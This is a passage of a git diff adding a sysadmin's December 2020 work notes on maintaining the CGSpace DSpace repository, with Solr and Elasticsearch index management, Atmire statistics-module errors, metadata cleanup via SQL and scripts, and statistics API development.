+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: java.lang.UnsupportedOperationException
+        at org.apache.solr.common.SolrDocument$1.entrySet(SolrDocument.java:256)
+        at java.util.HashMap.putMapEntries(HashMap.java:512)
+        at java.util.HashMap.<init>(HashMap.java:490)
+        at com.atmire.statistics.util.update.atomic.record.Record.getFieldValuesMap(SourceFile:86)
+        at com.atmire.statistics.util.update.atomic.processor.DeduplicateValuesProcessor.process(SourceFile:38)
+        at com.atmire.statistics.util.update.atomic.processor.DeduplicateValuesProcessor.visit(SourceFile:34)
+        at com.atmire.statistics.util.update.atomic.record.UsageRecord.accept(SourceFile:23)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:301)
+        ... 10 more
+
    +
  • I sent some feedback to Atmire +
      +
    • They responded with an updated CUA (6.x-4.1.10-ilri-RC7) that has a fix for the duplicates processor and a possible fix for the database locking issues (a bug in CUASolrLoggerServiceImpl that causes an infinite loop and a Tomcat timeout)
    • +
    • I deployed the changes on DSpace Test and CGSpace, hopefully it will fix both issues!
    • +
    +
  • +
  • In other news, after I restarted Tomcat on CGSpace the statistics-2013 core didn’t come back up properly, so I exported it and imported it into the main statistics core like I did for the others a few days ago
  • +
  • Sync DSpace Test with CGSpace’s Solr, PostgreSQL database, and assetstore…
  • +
+

2020-12-09

+
    +
  • I was running the AtomicStatisticsUpdateCLI to remove duplicates on DSpace Test, but it failed near the end of processing the statistics core (after 20 hours or so) with a memory error:
  • +
+
Successfully finished updating Solr Storage Reports | Wed Dec 09 15:25:11 CET 2020
+Run 1 —  67% — 10,000/14,935 docs — 6m 6s — 6m 6s
+Exception: GC overhead limit exceeded
+java.lang.OutOfMemoryError: GC overhead limit exceeded
+        at org.noggit.CharArr.toString(CharArr.java:164)
+
    +
  • I increased the JVM heap to 2048m and tried again, but it failed with a memory error again…
  • +
  • I increased the JVM heap to 4096m and tried again (see the JAVA_OPTS sketch after the error below), but it failed with another error:
  • +
+
Successfully finished updating Solr Storage Reports | Wed Dec 09 15:53:40 CET 2020
+Exception: parsing error
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: parsing error
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:530)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.QueryRequest.process(QueryRequest.java:91)
+        at org.apache.solr.client.solrj.SolrServer.query(SolrServer.java:301)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.getNextSetOfSolrDocuments(SourceFile:392)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:157)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: org.apache.solr.common.SolrException: parsing error
+        at org.apache.solr.client.solrj.impl.BinaryResponseParser.processResponse(BinaryResponseParser.java:45)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:528)
+        ... 14 more
+Caused by: org.apache.http.TruncatedChunkException: Truncated chunk ( expected size: 8192; actual size: 2843)
+        at org.apache.http.impl.io.ChunkedInputStream.read(ChunkedInputStream.java:200)
+        at org.apache.http.conn.EofSensorInputStream.read(EofSensorInputStream.java:137)
+        at org.apache.solr.common.util.FastInputStream.readWrappedStream(FastInputStream.java:80)
+        at org.apache.solr.common.util.FastInputStream.refill(FastInputStream.java:89)
+        at org.apache.solr.common.util.FastInputStream.read(FastInputStream.java:125)
+        at org.apache.solr.common.util.FastInputStream.readFully(FastInputStream.java:152)
+...
+
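  • For reference, the heap increases were done by exporting JAVA_OPTS before re-running the CLI; a sketch following the same pattern used later for the Discovery re-index (the exact options here are an assumption):

$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx4096m"
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics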

2020-12-10

+
    +
  • The duplicate removal finished on the statistics-2019 core, so I started it on the statistics-2017 core
  • +
  • Peter asked me to add ONE HEALTH to ILRI subjects on CGSpace
  • +
  • A few items that got “lost” after approval during the database issues earlier this week seem to have gone back into their workflows +
      +
    • Abenet approved them again and they got new handles, phew
    • +
    +
  • +
  • Abenet was having an issue with the date filter on AReS and it turns out that it’s the same .keyword issue I had noticed before that causes the filter to stop working + +
  • +
  • I checked the Solr statistics on DSpace Test to see if the Atmire duplicates remover was working, but now I see a comical amount of duplicates…
  • +
+

Solr stats with dozens of duplicates

+
    +
  • I sent feedback about this to Atmire
  • +
  • I will re-sync the Solr stats from CGSpace so we can try again…
  • +
  • In other news, it has been a few days since we deployed the fix for the database locking issue and things seem much better now:
  • +
+

PostgreSQL connections all week / PostgreSQL locks all week

+

2020-12-13

+
    +
  • I tried to harvest a few times on OpenRXV in the last few days and every time it appends all the new records to the items index instead of overwriting it:
  • +
+

OpenRXV duplicates

+
    +
  • I can see it in the openrxv-items-final index:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*' | json_pp
+{
+   "_shards" : {
+      "failed" : 0,
+      "skipped" : 0,
+      "successful" : 1,
+      "total" : 1
+   },
+   "count" : 299922
+}
+
+
$ curl -XDELETE http://localhost:9200/openrxv-items-final
+{"acknowledged":true}%
+
    +
  • Moayad said he’s working on the harvesting so I stopped it for now to re-deploy his latest changes
  • +
  • I updated Tomcat to version 7.0.107 on CGSpace (linode18), ran all updates, and restarted the server
  • +
  • I deleted both items indexes and restarted the harvesting:
  • +
+
$ curl -XDELETE http://localhost:9200/openrxv-items-final
+$ curl -XDELETE http://localhost:9200/openrxv-items-temp
+
    +
  • Peter asked me for a list of all submitters and approvers that were active recently on CGSpace +
      +
    • I can probably extract that from the dc.description.provenance field, for example any that contains a 2020 date:
    • +
    +
  • +
+
localhost/dspace63= > SELECT * FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ '^.*on 2020-[0-9]{2}-*';
+

2020-12-14

+
    +
  • The re-harvesting finished last night on AReS but there are no records in the openrxv-items-final index +
      +
    • Strangely, there are 99,000 items in the temp index:
    • +
    +
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*' | json_pp
+{
+   "count" : 99992,
+   "_shards" : {
+      "skipped" : 0,
+      "total" : 1,
+      "failed" : 0,
+      "successful" : 1
+   }
+}
+
    +
  • I’m going to try to clone the temp index to the final one… +
      +
    • First, set the openrxv-items-temp index to block writes (read only) and then clone it to openrxv-items-final:
    • +
    +
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
+{"acknowledged":true,"shards_acknowledged":true,"index":"openrxv-items-final"}
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
+
    +
  • Now I see that the openrxv-items-final index has items, but there are still none in AReS Explorer UI!
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
+{
+  "count" : 99992,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
    +
  • The api logs show this from last night after the harvesting:
  • +
+
[Nest] 92   - 12/13/2020, 1:58:52 PM   [HarvesterService] Starting Harvest
+[Nest] 92   - 12/13/2020, 10:50:20 PM   [FetchConsumer] OnGlobalQueueDrained
+[Nest] 92   - 12/13/2020, 11:00:20 PM   [PluginsConsumer] OnGlobalQueueDrained
+[Nest] 92   - 12/13/2020, 11:00:20 PM   [HarvesterService] reindex function is called
+(node:92) UnhandledPromiseRejectionWarning: ResponseError: index_not_found_exception
+    at IncomingMessage.<anonymous> (/backend/node_modules/@elastic/elasticsearch/lib/Transport.js:232:25)
+    at IncomingMessage.emit (events.js:326:22)
+    at endReadableNT (_stream_readable.js:1223:12)
+    at processTicksAndRejections (internal/process/task_queues.js:84:21)
+
    +
  • But I’m not sure why the frontend doesn’t show any data despite there being documents in the index…
  • +
  • I talked to Moayad and he reminded me that OpenRXV uses an alias to point to temp and final indexes, but the UI actually uses the openrxv-items index
  • +
  • I cloned the openrxv-items-final index to openrxv-items index and now I see items in the explorer UI
  • +
  • The PDF report was broken and I looked in the API logs and saw this:
  • +
+
(node:94) UnhandledPromiseRejectionWarning: Error: Error: Could not find soffice binary
+    at ExportService.downloadFile (/backend/dist/export/services/export/export.service.js:51:19)
+    at processTicksAndRejections (internal/process/task_queues.js:97:5)
+
    +
  • I installed unoconv in the backend api container and now it works… but I wonder why this changed…
  • +
  • Skype with Abenet and Peter to discuss AReS, which will be shown to ILRI scientists this week +
      +
    • Peter noticed that this item from the ILRI policy and research briefs collection is missing in AReS, despite it being added one month ago in CGSpace and me harvesting on AReS last night +
        +
      • The item appears fine in the REST API when I check the items in that collection
      • +
      +
    • +
    • Peter also noticed that this item appears twice in AReS +
        +
      • The item is not duplicated on CGSpace or in the REST API
      • +
      +
    • +
    • We noticed that there are 136 items in the ILRI policy and research briefs collection according to AReS, yet on CGSpace there are only 132 +
        +
      • This is confirmed in the REST API (using query-json):
      • +
      +
    • +
    +
  • +
+
$ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&limit=100&offset=0' | json_pp > /tmp/policy1.json
+$ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&limit=100&offset=100' | json_pp > /tmp/policy2.json
+$ query-json '.items | length' /tmp/policy1.json
+100
+$ query-json '.items | length' /tmp/policy2.json
+32
+
    +
  • I realized that the issue of missing/duplicate items in AReS might be because of this REST API bug that causes /items to return items in non-deterministic order
  • +
  • I decided to cherry-pick the following two patches from DSpace 6.4 into our 6_x-prod (6.3) branch: + +
  • +
  • After deploying the REST API fixes I decided to harvest from AReS again to see if the missing and duplicate items get fixed +
      +
    • I made a backup of the current openrxv-items-temp index just in case:
    • +
    +
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-2020-12-14
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
+

2020-12-15

+
    +
  • After the re-harvest last night there were 200,000 items in the openrxv-items-temp index again +
      +
    • I cleared the core and started a re-harvest, but Peter sent me a bunch of author corrections for CGSpace so I decided to cancel it until after I apply them and re-index Discovery
    • +
    +
  • +
  • I checked the 1,534 fixes in OpenRefine (had to fix a few UTF-8 errors, as always from Peter’s CSVs) and then applied them using the fix-metadata-values.py script:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2020-10-28-fix-1534-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
+$ ./delete-metadata-values.py -i /tmp/2020-10-28-delete-2-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3
+
    +
  • Since I was re-indexing Discovery anyways I decided to check for any uppercase AGROVOC and lowercase them:
  • +
+
dspace=# BEGIN;
+BEGIN
+dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
+UPDATE 406
+dspace=# COMMIT;
+COMMIT
+
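  • A sketch of a quick re-check after the COMMIT (it should return 0 if the update caught everything):

$ psql -h localhost -U postgres dspace -c "SELECT COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';"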
    +
  • I also updated the Font Awesome icon classes for version 5 syntax:
  • +
+
dspace=# BEGIN;
+dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'fa fa-rss','fas fa-rss', 'g') WHERE text_value LIKE '%fa fa-rss%';
+UPDATE 74
+dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'fa fa-at','fas fa-at', 'g') WHERE text_value LIKE '%fa fa-at%';
+UPDATE 74
+dspace=# COMMIT;
+
    +
  • Then I started a full Discovery re-index:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
+$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    265m11.224s
+user    171m29.141s
+sys     2m41.097s
+
    +
  • Udana sent a report that the WLE approver is experiencing the same issue Peter highlighted a few weeks ago: they are unable to save metadata edits in the workflow
  • +
  • Yesterday Atmire responded about the owningComm and owningColl duplicates in Solr saying they didn’t see any anymore… +
      +
    • Indeed I spent a few minutes looking randomly and I didn’t find any either…
    • +
    • I did, however, see lots of duplicates in countryCode_search, countryCode_ngram, ip_search, ip_ngram, userAgent_search, userAgent_ngram, referrer_search, referrer_ngram fields
    • +
    • I sent feedback to them
    • +
    +
  • +
  • On the database locking front we haven’t had issues in over a week and the Munin graphs look normal:
  • +
+

PostgreSQL connections all week / PostgreSQL locks all week

+
    +
  • After the Discovery re-indexing finished on CGSpace I prepared to start re-harvesting AReS by making sure the openrxv-items-temp index was empty and that the backup index I made yesterday was still there:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
+{
+  "acknowledged" : true
+}
+$ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
+{
+  "count" : 0,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+$ curl -s 'http://localhost:9200/openrxv-items-2020-12-14/_count?q=*&pretty'
+{
+  "count" : 99992,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+

2020-12-16

+
    +
  • The harvesting on AReS finished last night so this morning I manually cloned the openrxv-items-temp index to openrxv-items +
      +
    • First check the number of items in the temp index, then set it to read only, then delete the items index, then delete the temp index:
    • +
    +
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 100046,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
+$ curl -s -X POST "http://localhost:9200/openrxv-items-temp/_clone/openrxv-items?pretty"
+$ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'
+{
+  "count" : 100046,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
+
    +
  • Interestingly the item that we noticed was duplicated now only appears once
  • +
  • The missing item is still missing
  • +
  • Jane Poole noticed that the “previous page” and “next page” buttons are not working on AReS + +
  • +
  • Generate a list of submitters and approvers active in the last months using the Provenance field on CGSpace:
  • +
+
$ psql -h localhost -U postgres dspace -c "SELECT text_value FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ '^.*on 2020-(06|07|08|09|10|11|12)-*'" > /tmp/provenance.txt
+$ grep -o -E 'by .*)' /tmp/provenance.txt | grep -v -E "( on |checksum)" | sed -e 's/by //' -e 's/ (/,/' -e 's/)//' | sort | uniq > /tmp/recent-submitters-approvers.csv
+
    +
  • Peter wanted it so that he could send some mail to the users…
  • +
+

2020-12-17

+
    +
  • I see some errors from CUA in our Tomcat logs:
  • +
+
Thu Dec 17 07:35:27 CET 2020 | Query:containerItem:b049326a-0e76-45a8-ac0c-d8ec043a50c6
+Error while updating
+java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl$5.visit(SourceFile:1155)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.visitEachStatisticShard(SourceFile:241)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1140)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1129)
+...
+
    +
  • I sent the full stack to Atmire to investigate +
      +
    • I know we’ve had this “Multiple update components target the same field” error in the past with DSpace 5.x and Atmire said it was harmless, but would nevertheless be fixed in a future update
    • +
    +
  • +
  • I was trying to export the ILRI community on CGSpace so I could update one of the ILRI author’s names, but it throws an error…
  • +
+
$ dspace metadata-export -i 10568/1 -f /tmp/2020-12-17-ILRI.csv
+Loading @mire database changes for module MQM
+Changes have been processed
+Exporting community 'International Livestock Research Institute (ILRI)' (10568/1)
+           Exception: null
+java.lang.NullPointerException
+        at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
+        at com.google.common.collect.Iterators.concat(Iterators.java:464)
+        at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
+        at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
+        at org.dspace.app.bulkedit.MetadataExport.<init>(MetadataExport.java:77)
+        at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • I did it via CSV with fix-metadata-values.py instead:
  • +
+
$ cat 2020-12-17-update-ILRI-author.csv
+dc.contributor.author,correct
+"Padmakumar, V.P.","Varijakshapanicker, Padmakumar"
+$ ./fix-metadata-values.py -i 2020-12-17-update-ILRI-author.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
+
    +
  • Abenet needed a list of all 2020 outputs from the Livestock CRP that were Limited Access +
      +
    • I exported the community from CGSpace and used csvcut and csvgrep to get a list:
    • +
    +
  • +
+
$ csvcut -c 'dc.identifier.citation[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dc.date.issued,dc.date.issued[],dc.date.issued[en_US],cg.identifier.status[en_US]' ~/Downloads/10568-80099.csv | csvgrep -c 'cg.identifier.status[en_US]' -m 'Limited Access' | csvgrep -c 'dc.date.issued' -m 2020 -c 'dc.date.issued[]' -m 2020 -c 'dc.date.issued[en_US]' -m 2020 > /tmp/limited-2020.csv
+
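  • A sketch of a quick row count on the result (csvstat is part of the same csvkit suite as csvcut and csvgrep):

$ csvstat --count /tmp/limited-2020.csv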

2020-12-18

+
    +
  • I added support for indexing community views and downloads to dspace-statistics-api +
      +
    • I still have to add the API endpoints to make the stats available
    • +
    • Also, I played a little bit with Swagger via falcon-swagger-ui and I think I can get that working for better API documentation / testing
    • +
    +
  • +
  • Atmire sent some feedback on the DeduplicateValuesProcessor +
      +
    • They confirm that it should process all duplicates, not just those in owningComm and owningColl
    • +
    • They asked me to try it again on DSpace Test now that I’ve resync’d the Solr statistics cores from production
    • +
    • I started processing the statistics core on DSpace Test
    • +
    +
  • +
+

2020-12-20

+
    +
  • The DeduplicateValuesProcessor had been running on DSpace Test for two days and had almost completed its second twelve-hour run, but crashed near the end:
  • +
+
...
+Run 1 — 100% — 8,230,000/8,239,228 docs — 39s — 9h 8m 31s
+Exception: Java heap space
+java.lang.OutOfMemoryError: Java heap space
+        at java.util.Arrays.copyOfRange(Arrays.java:3664)
+        at java.lang.String.<init>(String.java:207)
+        at org.noggit.CharArr.toString(CharArr.java:164)
+        at org.apache.solr.common.util.JavaBinCodec.readStr(JavaBinCodec.java:599)
+        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:180)
+        at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
+        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
+        at org.apache.solr.common.util.JavaBinCodec.readSolrDocument(JavaBinCodec.java:360)
+        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:219)
+        at org.apache.solr.common.util.JavaBinCodec.readArray(JavaBinCodec.java:492)
+        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:186)
+        at org.apache.solr.common.util.JavaBinCodec.readSolrDocumentList(JavaBinCodec.java:374)
+        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:221)
+        at org.apache.solr.common.util.JavaBinCodec.readOrderedMap(JavaBinCodec.java:125)
+        at org.apache.solr.common.util.JavaBinCodec.readVal(JavaBinCodec.java:188)
+        at org.apache.solr.common.util.JavaBinCodec.unmarshal(JavaBinCodec.java:116)
+        at org.apache.solr.client.solrj.impl.BinaryResponseParser.processResponse(BinaryResponseParser.java:43)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:528)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.QueryRequest.process(QueryRequest.java:91)
+        at org.apache.solr.client.solrj.SolrServer.query(SolrServer.java:301)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.getNextSetOfSolrDocuments(SourceFile:392)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:157)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • That was with a JVM heap of 512m
  • +
  • I looked in Solr and found dozens of duplicates of each field again… + +
  • +
  • I finished the technical work on adding community and collection support to the DSpace Statistics API +
      +
    • I still need to update the tests as well as the documentation
    • +
    +
  • +
  • I started a harvesting of AReS
  • +
+

2020-12-21

+
    +
  • The AReS harvest finished this morning and I moved the Elasticsearch index manually
  • +
  • First, check the number of records in the temp index to make sure it seems complete and not with double data:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 100135,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
    +
  • Then delete the old backup and clone the current items index as a backup:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-2020-12-14?pretty'
+$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-21
+
    +
  • Then delete the current items index and clone it from temp:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
+

2020-12-22

+
    +
  • I finished getting the Swagger UI integrated into the dspace-statistics-api +
      +
    • I can’t figure out how to get it to work on the server without hard-coding all the paths
    • +
    • Falcon is smart about its own routes, so I can retrieve the openapi.json file OK, but the paths in the OpenAPI schema are relative to the base URL, which is dspacetest.cgiar.org
    • +
    +
  • +
  • Abenet told me about a bug with shared links and strange values in the top counters + +
  • +
+

2020-12-23

+
    +
  • Finalize Swagger UI support in the dspace-statistics-api +
      +
    • I had to do some last minute changes to get it to work in both production and local development environments
    • +
    +
  • +
+

2020-12-27

+ +

2020-12-28

+
    +
  • Peter noticed that the Atmire CUA stats on CGSpace weren’t working +
      +
    • I looked in Solr Admin UI and saw that the statistics-2012 core failed to load:
    • +
    +
  • +
+
statistics-2012: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher
+
    +
  • I exported the 2012 stats from the year core and imported them to the main statistics core with solr-import-export-json:
  • +
+
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2012 -a export -o statistics-2012.json -k uid
+$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2012.json -k uid
+$ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
+
    +
  • I decided to do the same for the remaining 2011, 2014, 2017, and 2019 cores…
  • +
+
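  • A sketch of scripting the remaining cores with the same three commands as above (assuming solr-import-export-json’s run.sh is in the current directory):

$ for year in 2011 2014 2017 2019; do
    chrt -b 0 ./run.sh -s "http://localhost:8081/solr/statistics-${year}" -a export -o "statistics-${year}.json" -k uid
    chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a import -o "statistics-${year}.json" -k uid
    curl -s "http://localhost:8081/solr/statistics-${year}/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
  done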

2020-12-29

+
    +
  • Start a fresh re-index on AReS, since it’s been over a week since the last time +
      +
    • Before that, I cleared the old openrxv-items-temp index and made a backup of the current openrxv-items index:
    • +
    +
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'
+{
+  "count" : 100135,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
+$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2020-12-29
+$ curl -X PUT "localhost:9200/openrxv-items/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
+

2020-12-30

+
    +
  • The indexing on AReS finished so I cloned the openrxv-items-temp index to openrxv-items and deleted the backup index:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items?pretty'
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings?pretty" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp?pretty'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-2020-12-29?pretty'
+
diff --git a/docs/2020/02/cgspace-stats-after.png b/docs/2020/02/cgspace-stats-after.png
new file mode 100644
index 000000000..850527067
Binary files /dev/null and b/docs/2020/02/cgspace-stats-after.png differ
diff --git a/docs/2020/02/cgspace-stats-before.png b/docs/2020/02/cgspace-stats-before.png
new file mode 100644
index 000000000..dc0caac85
Binary files /dev/null and b/docs/2020/02/cgspace-stats-before.png differ
diff --git a/docs/2020/02/cgspace-stats-years.png b/docs/2020/02/cgspace-stats-years.png
new file mode 100644
index 000000000..3216d4a4e
Binary files /dev/null and b/docs/2020/02/cgspace-stats-years.png differ
diff --git a/docs/2020/02/flamegraph-java-cli-dspace58.svg b/docs/2020/02/flamegraph-java-cli-dspace58.svg
new file mode 100644
index 000000000..75ed8cd58
--- /dev/null
+++ b/docs/2020/02/flamegraph-java-cli-dspace58.svg
@@ -0,0 +1,4200 @@
(flame graph SVG of a DSpace 5.8 Java CLI run; ~4,200 lines of generated SVG frame markup omitted)
